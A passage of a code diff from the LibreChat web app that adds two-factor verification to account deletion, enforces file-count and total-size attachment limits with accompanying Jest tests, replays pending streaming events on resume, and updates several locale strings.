let payload: TDeleteUserRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
deleteUser(payload);
}; };
const handleInputChange = useCallback( const handleInputChange = useCallback(
@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
[user?.email], [user?.email],
); );
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return ( return (
<> <>
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}> <OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
(e) => handleInputChange(e.target.value), (e) => handleInputChange(e.target.value),
)} )}
</div> </div>
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked, localize)} {needs2FA && (
<div className="mb-4 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
</div> </div>
</OGDialogContent> </OGDialogContent>
</OGDialog> </OGDialog>

View file

@ -18,7 +18,7 @@ const mockEndpointsConfig: TEndpointsConfig = {
'Some Endpoint': { type: EModelEndpoint.custom, userProvide: false, order: 9999 }, 'Some Endpoint': { type: EModelEndpoint.custom, userProvide: false, order: 9999 },
}; };
let mockFileConfig = mergeFileConfig({ const defaultFileConfig = mergeFileConfig({
endpoints: { endpoints: {
Moonshot: { fileLimit: 5 }, Moonshot: { fileLimit: 5 },
[EModelEndpoint.agents]: { fileLimit: 20 }, [EModelEndpoint.agents]: { fileLimit: 20 },
@ -26,6 +26,8 @@ let mockFileConfig = mergeFileConfig({
}, },
}); });
let mockFileConfig = defaultFileConfig;
jest.mock('~/data-provider', () => ({ jest.mock('~/data-provider', () => ({
useGetEndpointsQuery: () => ({ data: mockEndpointsConfig }), useGetEndpointsQuery: () => ({ data: mockEndpointsConfig }),
useGetFileConfig: ({ select }: { select?: (data: unknown) => unknown }) => ({ useGetFileConfig: ({ select }: { select?: (data: unknown) => unknown }) => ({
@ -118,13 +120,16 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => {
}); });
describe('disabled state', () => { describe('disabled state', () => {
beforeEach(() => {
mockFileConfig = defaultFileConfig;
});
it('reports not disabled for standard config', () => { it('reports not disabled for standard config', () => {
render(<TestWrapper provider="Moonshot" />); render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('false'); expect(screen.getByTestId('disabled').textContent).toBe('false');
}); });
it('reports disabled when provider-specific config is disabled', () => { it('reports disabled when provider-specific config is disabled', () => {
const original = mockFileConfig;
mockFileConfig = mergeFileConfig({ mockFileConfig = mergeFileConfig({
endpoints: { endpoints: {
Moonshot: { disabled: true }, Moonshot: { disabled: true },
@ -135,8 +140,44 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => {
render(<TestWrapper provider="Moonshot" />); render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('true'); expect(screen.getByTestId('disabled').textContent).toBe('true');
});
mockFileConfig = original; it('reports disabled when agents config is disabled and no provider set', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper />);
expect(screen.getByTestId('disabled').textContent).toBe('true');
});
it('reports disabled when agents is disabled and provider has no specific config', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper provider="Some Endpoint" />);
expect(screen.getByTestId('disabled').textContent).toBe('true');
});
it('provider-specific enabled overrides agents disabled', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { disabled: false, fileLimit: 5 },
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('false');
expect(screen.getByTestId('fileLimit').textContent).toBe('5');
}); });
}); });

View file

@ -24,14 +24,14 @@ import {
type ColumnFiltersState, type ColumnFiltersState,
} from '@tanstack/react-table'; } from '@tanstack/react-table';
import { import {
fileConfig as defaultFileConfig,
checkOpenAIStorage,
mergeFileConfig,
megabyte, megabyte,
mergeFileConfig,
checkOpenAIStorage,
isAssistantsEndpoint, isAssistantsEndpoint,
getEndpointFileConfig, getEndpointFileConfig,
type TFile, fileConfig as defaultFileConfig,
} from 'librechat-data-provider'; } from 'librechat-data-provider';
import type { TFile } from 'librechat-data-provider';
import { MyFilesModal } from '~/components/Chat/Input/Files/MyFilesModal'; import { MyFilesModal } from '~/components/Chat/Input/Files/MyFilesModal';
import { useFileMapContext, useChatContext } from '~/Providers'; import { useFileMapContext, useChatContext } from '~/Providers';
import { useLocalize, useUpdateFiles } from '~/hooks'; import { useLocalize, useUpdateFiles } from '~/hooks';
@ -86,7 +86,7 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
const fileMap = useFileMapContext(); const fileMap = useFileMapContext();
const { showToast } = useToastContext(); const { showToast } = useToastContext();
const { setFiles, conversation } = useChatContext(); const { files, setFiles, conversation } = useChatContext();
const { data: fileConfig = null } = useGetFileConfig({ const { data: fileConfig = null } = useGetFileConfig({
select: (data) => mergeFileConfig(data), select: (data) => mergeFileConfig(data),
}); });
@ -142,7 +142,15 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
return; return;
} }
if (fileData.bytes > (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) { if (endpointFileConfig.fileLimit && files.size >= endpointFileConfig.fileLimit) {
showToast({
message: `${localize('com_ui_attach_error_limit')} ${endpointFileConfig.fileLimit} files (${endpoint})`,
status: 'error',
});
return;
}
if (fileData.bytes >= (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) {
showToast({ showToast({
message: `${localize('com_ui_attach_error_size')} ${ message: `${localize('com_ui_attach_error_size')} ${
(endpointFileConfig.fileSizeLimit ?? 0) / megabyte (endpointFileConfig.fileSizeLimit ?? 0) / megabyte
@ -160,6 +168,22 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
return; return;
} }
if (endpointFileConfig.totalSizeLimit) {
const existing = files.get(fileData.file_id);
let currentTotalSize = 0;
for (const f of files.values()) {
currentTotalSize += f.size;
}
currentTotalSize -= existing?.size ?? 0;
if (currentTotalSize + fileData.bytes > endpointFileConfig.totalSizeLimit) {
showToast({
message: `${localize('com_ui_attach_error_total_size')} ${endpointFileConfig.totalSizeLimit / megabyte} MB (${endpoint})`,
status: 'error',
});
return;
}
}
addFile({ addFile({
progress: 1, progress: 1,
attached: true, attached: true,
@ -175,7 +199,7 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
metadata: fileData.metadata, metadata: fileData.metadata,
}); });
}, },
[addFile, fileMap, conversation, localize, showToast, fileConfig], [addFile, files, fileMap, conversation, localize, showToast, fileConfig],
); );
const filenameFilter = table.getColumn('filename')?.getFilterValue() as string; const filenameFilter = table.getColumn('filename')?.getFilterValue() as string;

View file

@ -0,0 +1,239 @@
import React from 'react';
import { render, screen, fireEvent } from '@testing-library/react';
import { FileSources } from 'librechat-data-provider';
import type { TFile } from 'librechat-data-provider';
import type { ExtendedFile } from '~/common';
import DataTable from '../PanelTable';
import { columns } from '../PanelColumns';
const mockShowToast = jest.fn();
const mockAddFile = jest.fn();
let mockFileMap: Record<string, TFile> = {};
let mockFiles: Map<string, ExtendedFile> = new Map();
let mockConversation: Record<string, unknown> | null = { endpoint: 'openAI' };
let mockRawFileConfig: Record<string, unknown> | null = {
endpoints: {
openAI: { fileLimit: 10, supportedMimeTypes: ['application/pdf', 'text/plain'] },
},
};
jest.mock('@librechat/client', () => ({
Table: ({ children, ...props }: { children: React.ReactNode }) => (
<table {...props}>{children}</table>
),
Button: ({
children,
...props
}: { children: React.ReactNode } & React.ButtonHTMLAttributes<HTMLButtonElement>) => (
<button {...props}>{children}</button>
),
TableRow: ({ children, ...props }: { children: React.ReactNode }) => (
<tr {...props}>{children}</tr>
),
TableHead: ({ children, ...props }: { children: React.ReactNode }) => (
<th {...props}>{children}</th>
),
TableBody: ({ children, ...props }: { children: React.ReactNode }) => (
<tbody {...props}>{children}</tbody>
),
TableCell: ({
children,
...props
}: { children: React.ReactNode } & React.TdHTMLAttributes<HTMLTableCellElement>) => (
<td {...props}>{children}</td>
),
FilterInput: () => <input data-testid="filter" />,
TableHeader: ({ children, ...props }: { children: React.ReactNode }) => (
<thead {...props}>{children}</thead>
),
useToastContext: () => ({ showToast: mockShowToast }),
}));
jest.mock('~/Providers', () => ({
useFileMapContext: () => mockFileMap,
useChatContext: () => ({
files: mockFiles,
setFiles: jest.fn(),
conversation: mockConversation,
}),
}));
jest.mock('~/hooks', () => ({
useLocalize: () => (key: string) => key,
useUpdateFiles: () => ({ addFile: mockAddFile }),
}));
jest.mock('~/data-provider', () => ({
useGetFileConfig: ({ select }: { select?: (d: unknown) => unknown }) => ({
data: select != null ? select(mockRawFileConfig) : mockRawFileConfig,
}),
}));
jest.mock('~/components/Chat/Input/Files/MyFilesModal', () => ({
MyFilesModal: () => null,
}));
jest.mock('../PanelFileCell', () => ({ row }: { row: { original: TFile } }) => (
<span>{row.original?.filename}</span>
));
function makeFile(overrides: Partial<TFile> = {}): TFile {
return {
user: 'user-1',
file_id: 'file-1',
bytes: 1024,
embedded: false,
filename: 'test.pdf',
filepath: '/files/test.pdf',
object: 'file',
type: 'application/pdf',
usage: 0,
source: FileSources.local,
...overrides,
};
}
function makeExtendedFile(overrides: Partial<ExtendedFile> = {}): ExtendedFile {
return {
file_id: 'ext-1',
size: 1024,
progress: 1,
source: FileSources.local,
...overrides,
};
}
function renderTable(data: TFile[]) {
return render(<DataTable columns={columns} data={data} />);
}
function clickFilenameCell() {
const cells = screen.getAllByRole('button');
const filenameCell = cells.find(
(cell) => cell.tagName === 'TD' && cell.textContent && !cell.textContent.includes('com_ui_'),
);
if (!filenameCell) {
throw new Error('Could not find filename cell with role="button" — check mock setup');
}
fireEvent.click(filenameCell);
return filenameCell;
}
describe('PanelTable handleFileClick', () => {
beforeEach(() => {
mockShowToast.mockClear();
mockAddFile.mockClear();
mockFiles = new Map();
mockConversation = { endpoint: 'openAI' };
mockRawFileConfig = {
endpoints: {
openAI: {
fileLimit: 5,
totalSizeLimit: 10,
supportedMimeTypes: ['application/pdf', 'text/plain'],
},
},
};
});
it('calls addFile when within file limits', () => {
const file = makeFile();
mockFileMap = { [file.file_id]: file };
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
expect(mockAddFile).toHaveBeenCalledWith(
expect.objectContaining({
file_id: file.file_id,
attached: true,
progress: 1,
}),
);
expect(mockShowToast).not.toHaveBeenCalledWith(expect.objectContaining({ status: 'error' }));
});
it('blocks attachment when fileLimit is reached', () => {
const file = makeFile({ file_id: 'new-file', filename: 'new.pdf' });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map(
Array.from({ length: 5 }, (_, i) => [
`existing-${i}`,
makeExtendedFile({ file_id: `existing-${i}` }),
]),
);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).not.toHaveBeenCalled();
expect(mockShowToast).toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_limit'),
status: 'error',
}),
);
});
it('blocks attachment when totalSizeLimit would be exceeded', () => {
const MB = 1024 * 1024;
const largeFile = makeFile({ file_id: 'large-file', bytes: 6 * MB });
mockFileMap = { [largeFile.file_id]: largeFile };
mockFiles = new Map([
['existing-1', makeExtendedFile({ file_id: 'existing-1', size: 5 * MB })],
]);
renderTable([largeFile]);
clickFilenameCell();
expect(mockAddFile).not.toHaveBeenCalled();
expect(mockShowToast).toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_total_size'),
status: 'error',
}),
);
});
it('does not double-count size of already-attached file', () => {
const MB = 1024 * 1024;
const file = makeFile({ file_id: 'reattach', bytes: 5 * MB });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map([
['reattach', makeExtendedFile({ file_id: 'reattach', size: 5 * MB })],
['other', makeExtendedFile({ file_id: 'other', size: 4 * MB })],
]);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
expect(mockShowToast).not.toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_total_size'),
}),
);
});
it('allows attachment when just under fileLimit', () => {
const file = makeFile({ file_id: 'under-limit' });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map(
Array.from({ length: 4 }, (_, i) => [
`existing-${i}`,
makeExtendedFile({ file_id: `existing-${i}` }),
]),
);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
});
});

View file

@ -68,14 +68,14 @@ export const useRefreshTokenMutation = (
/* User */ /* User */
export const useDeleteUserMutation = ( export const useDeleteUserMutation = (
options?: t.MutationOptions<unknown, undefined>, options?: t.MutationOptions<unknown, t.TDeleteUserRequest | undefined>,
): UseMutationResult<unknown, unknown, undefined, unknown> => { ): UseMutationResult<unknown, unknown, t.TDeleteUserRequest | undefined, unknown> => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
const clearStates = useClearStates(); const clearStates = useClearStates();
const resetDefaultPreset = useResetRecoilState(store.defaultPreset); const resetDefaultPreset = useResetRecoilState(store.defaultPreset);
return useMutation([MutationKeys.deleteUser], { return useMutation([MutationKeys.deleteUser], {
mutationFn: () => dataService.deleteUser(), mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload),
...(options || {}), ...(options || {}),
onSuccess: (...args) => { onSuccess: (...args) => {
resetDefaultPreset(); resetDefaultPreset();
@ -90,11 +90,11 @@ export const useDeleteUserMutation = (
export const useEnableTwoFactorMutation = (): UseMutationResult< export const useEnableTwoFactorMutation = (): UseMutationResult<
t.TEnable2FAResponse, t.TEnable2FAResponse,
unknown, unknown,
void, t.TEnable2FARequest | undefined,
unknown unknown
> => { > => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
return useMutation(() => dataService.enableTwoFactor(), { return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), {
onSuccess: (data) => { onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa'], data); queryClient.setQueryData([QueryKeys.user, '2fa'], data);
}, },
@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult<
export const useRegenerateBackupCodesMutation = (): UseMutationResult< export const useRegenerateBackupCodesMutation = (): UseMutationResult<
t.TRegenerateBackupCodesResponse, t.TRegenerateBackupCodesResponse,
unknown, unknown,
void, t.TRegenerateBackupCodesRequest | undefined,
unknown unknown
> => { > => {
const queryClient = useQueryClient(); const queryClient = useQueryClient();
return useMutation(() => dataService.regenerateBackupCodes(), { return useMutation(
onSuccess: (data) => { (payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload),
queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data); {
onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data);
},
}, },
}); );
}; };
export const useVerifyTwoFactorTempMutation = ( export const useVerifyTwoFactorTempMutation = (

View file

@ -112,7 +112,7 @@ describe('useArtifactProps', () => {
expect(result.current.files['content.md']).toBe('# No content provided'); expect(result.current.files['content.md']).toBe('# No content provided');
}); });
it('should provide marked-react dependency', () => { it('should provide react-markdown dependency', () => {
const artifact = createArtifact({ const artifact = createArtifact({
type: 'text/markdown', type: 'text/markdown',
content: '# Test', content: '# Test',
@ -120,7 +120,9 @@ describe('useArtifactProps', () => {
const { result } = renderHook(() => useArtifactProps({ artifact })); const { result } = renderHook(() => useArtifactProps({ artifact }));
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('marked-react'); expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('react-markdown');
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-gfm');
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-breaks');
}); });
it('should update files when content changes', () => { it('should update files when content changes', () => {

View file

@ -226,12 +226,12 @@ export default function useResumableSSE(
if (data.sync != null) { if (data.sync != null) {
console.log('[ResumableSSE] SYNC received', { console.log('[ResumableSSE] SYNC received', {
runSteps: data.resumeState?.runSteps?.length ?? 0, runSteps: data.resumeState?.runSteps?.length ?? 0,
pendingEvents: data.pendingEvents?.length ?? 0,
}); });
const runId = v4(); const runId = v4();
setActiveRunId(runId); setActiveRunId(runId);
// Replay run steps
if (data.resumeState?.runSteps) { if (data.resumeState?.runSteps) {
for (const runStep of data.resumeState.runSteps) { for (const runStep of data.resumeState.runSteps) {
stepHandler({ event: 'on_run_step', data: runStep }, { stepHandler({ event: 'on_run_step', data: runStep }, {
@ -241,19 +241,15 @@ export default function useResumableSSE(
} }
} }
// Set message content from aggregatedContent
if (data.resumeState?.aggregatedContent && userMessage?.messageId) { if (data.resumeState?.aggregatedContent && userMessage?.messageId) {
const messages = getMessages() ?? []; const messages = getMessages() ?? [];
const userMsgId = userMessage.messageId; const userMsgId = userMessage.messageId;
const serverResponseId = data.resumeState.responseMessageId; const serverResponseId = data.resumeState.responseMessageId;
// Find the EXACT response message - prioritize responseMessageId from server
// This is critical when there are multiple responses to the same user message
let responseIdx = -1; let responseIdx = -1;
if (serverResponseId) { if (serverResponseId) {
responseIdx = messages.findIndex((m) => m.messageId === serverResponseId); responseIdx = messages.findIndex((m) => m.messageId === serverResponseId);
} }
// Fallback: find by parentMessageId pattern (for new messages)
if (responseIdx < 0) { if (responseIdx < 0) {
responseIdx = messages.findIndex( responseIdx = messages.findIndex(
(m) => (m) =>
@ -272,7 +268,6 @@ export default function useResumableSSE(
}); });
if (responseIdx >= 0) { if (responseIdx >= 0) {
// Update existing response message with aggregatedContent
const updated = [...messages]; const updated = [...messages];
const oldContent = updated[responseIdx]?.content; const oldContent = updated[responseIdx]?.content;
updated[responseIdx] = { updated[responseIdx] = {
@ -285,25 +280,34 @@ export default function useResumableSSE(
newContentLength: data.resumeState.aggregatedContent?.length, newContentLength: data.resumeState.aggregatedContent?.length,
}); });
setMessages(updated); setMessages(updated);
// Sync both content handler and step handler with the updated message
// so subsequent deltas build on synced content, not stale content
resetContentHandler(); resetContentHandler();
syncStepMessage(updated[responseIdx]); syncStepMessage(updated[responseIdx]);
console.log('[ResumableSSE] SYNC complete, handlers synced'); console.log('[ResumableSSE] SYNC complete, handlers synced');
} else { } else {
// Add new response message
const responseId = serverResponseId ?? `${userMsgId}_`; const responseId = serverResponseId ?? `${userMsgId}_`;
setMessages([ const newMessage = {
...messages, messageId: responseId,
{ parentMessageId: userMsgId,
messageId: responseId, conversationId: currentSubmission.conversation?.conversationId ?? '',
parentMessageId: userMsgId, text: '',
conversationId: currentSubmission.conversation?.conversationId ?? '', content: data.resumeState.aggregatedContent,
text: '', isCreatedByUser: false,
content: data.resumeState.aggregatedContent, } as TMessage;
isCreatedByUser: false, setMessages([...messages, newMessage]);
} as TMessage, resetContentHandler();
]); syncStepMessage(newMessage);
}
}
if (data.pendingEvents?.length > 0) {
console.log(`[ResumableSSE] Replaying ${data.pendingEvents.length} pending events`);
const submission = { ...currentSubmission, userMessage } as EventSubmission;
for (const pendingEvent of data.pendingEvents) {
if (pendingEvent.event != null) {
stepHandler(pendingEvent, submission);
} else if (pendingEvent.type != null) {
contentHandler({ data: pendingEvent, submission });
}
} }
} }

View file

@ -372,6 +372,7 @@
"com_error_missing_model": "No model selected for {{0}}. Please select a model and try again.", "com_error_missing_model": "No model selected for {{0}}. Please select a model and try again.",
"com_error_models_not_loaded": "Models configuration could not be loaded. Please refresh the page and try again.", "com_error_models_not_loaded": "Models configuration could not be loaded. Please refresh the page and try again.",
"com_error_moderation": "It appears that the content submitted has been flagged by our moderation system for not aligning with our community guidelines. We're unable to proceed with this specific topic. If you have any other questions or topics you'd like to explore, please edit your message, or create a new conversation.", "com_error_moderation": "It appears that the content submitted has been flagged by our moderation system for not aligning with our community guidelines. We're unable to proceed with this specific topic. If you have any other questions or topics you'd like to explore, please edit your message, or create a new conversation.",
"com_error_invalid_base_url": "The base URL you provided targets a restricted address. Please use a valid external URL and try again.",
"com_error_no_base_url": "No base URL found. Please provide one and try again.", "com_error_no_base_url": "No base URL found. Please provide one and try again.",
"com_error_no_user_key": "No key found. Please provide a key and try again.", "com_error_no_user_key": "No key found. Please provide a key and try again.",
"com_error_refusal": "Response refused by safety filters. Rewrite your message and try again. If you encounter this frequently while using Claude Sonnet 4.5 or Opus 4.1, you can try Sonnet 4, which has different usage restrictions.", "com_error_refusal": "Response refused by safety filters. Rewrite your message and try again. If you encounter this frequently while using Claude Sonnet 4.5 or Opus 4.1, you can try Sonnet 4, which has different usage restrictions.",
@ -639,6 +640,7 @@
"com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings", "com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings",
"com_ui_2fa_invalid": "Invalid two-factor authentication code", "com_ui_2fa_invalid": "Invalid two-factor authentication code",
"com_ui_2fa_setup": "Setup 2FA", "com_ui_2fa_setup": "Setup 2FA",
"com_ui_2fa_verification_required": "Enter your 2FA code to continue",
"com_ui_2fa_verified": "Successfully verified Two-Factor Authentication", "com_ui_2fa_verified": "Successfully verified Two-Factor Authentication",
"com_ui_accept": "I accept", "com_ui_accept": "I accept",
"com_ui_action_button": "Action Button", "com_ui_action_button": "Action Button",
@ -747,7 +749,9 @@
"com_ui_attach_error": "Cannot attach file. Create or select a conversation, or try refreshing the page.", "com_ui_attach_error": "Cannot attach file. Create or select a conversation, or try refreshing the page.",
"com_ui_attach_error_disabled": "File uploads are disabled for this endpoint", "com_ui_attach_error_disabled": "File uploads are disabled for this endpoint",
"com_ui_attach_error_openai": "Cannot attach Assistant files to other endpoints", "com_ui_attach_error_openai": "Cannot attach Assistant files to other endpoints",
"com_ui_attach_error_limit": "File limit reached:",
"com_ui_attach_error_size": "File size limit exceeded for endpoint:", "com_ui_attach_error_size": "File size limit exceeded for endpoint:",
"com_ui_attach_error_total_size": "Total file size limit exceeded for endpoint:",
"com_ui_attach_error_type": "Unsupported file type for endpoint:", "com_ui_attach_error_type": "Unsupported file type for endpoint:",
"com_ui_attach_remove": "Remove file", "com_ui_attach_remove": "Remove file",
"com_ui_attach_warn_endpoint": "Non-Assistant files may be ignored without a compatible tool", "com_ui_attach_warn_endpoint": "Non-Assistant files may be ignored without a compatible tool",

View file

@ -1203,7 +1203,7 @@
"com_ui_upload_image_input": "Téléverser une image", "com_ui_upload_image_input": "Téléverser une image",
"com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite", "com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite",
"com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo", "com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo",
"com_ui_upload_ocr_text": "Téléchager en tant que texte", "com_ui_upload_ocr_text": "Télécharger en tant que texte",
"com_ui_upload_provider": "Télécharger vers le fournisseur", "com_ui_upload_provider": "Télécharger vers le fournisseur",
"com_ui_upload_success": "Fichier téléversé avec succès", "com_ui_upload_success": "Fichier téléversé avec succès",
"com_ui_upload_type": "Sélectionner le type de téléversement", "com_ui_upload_type": "Sélectionner le type de téléversement",

View file

@ -39,7 +39,7 @@
"com_agents_description_card": "Apraksts: {{description}}", "com_agents_description_card": "Apraksts: {{description}}",
"com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit", "com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit",
"com_agents_empty_state_heading": "Nav atrasts neviens aģents", "com_agents_empty_state_heading": "Nav atrasts neviens aģents",
"com_agents_enable_file_search": "Iespējot vektorizēto meklēšanu", "com_agents_enable_file_search": "Iespējot meklēšanu dokumentos",
"com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.", "com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.",
"com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.", "com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.",
"com_agents_error_category_title": "Kategorija Kļūda", "com_agents_error_category_title": "Kategorija Kļūda",
@ -66,7 +66,7 @@
"com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.", "com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.",
"com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.", "com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.",
"com_agents_file_context_label": "Pievienot failu kā kontekstu", "com_agents_file_context_label": "Pievienot failu kā kontekstu",
"com_agents_file_search_disabled": "Lai varētu iespējot vektorizētu meklēšanu ir jāizveido aģents.", "com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.",
"com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.", "com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.",
"com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā", "com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā",
"com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents", "com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents",
@ -126,7 +126,7 @@
"com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta", "com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta",
"com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu", "com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu",
"com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}", "com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}",
"com_assistants_file_search": "Vektorizētā Meklēšana (RAG)", "com_assistants_file_search": "Meklēšana dokumentos",
"com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.", "com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam 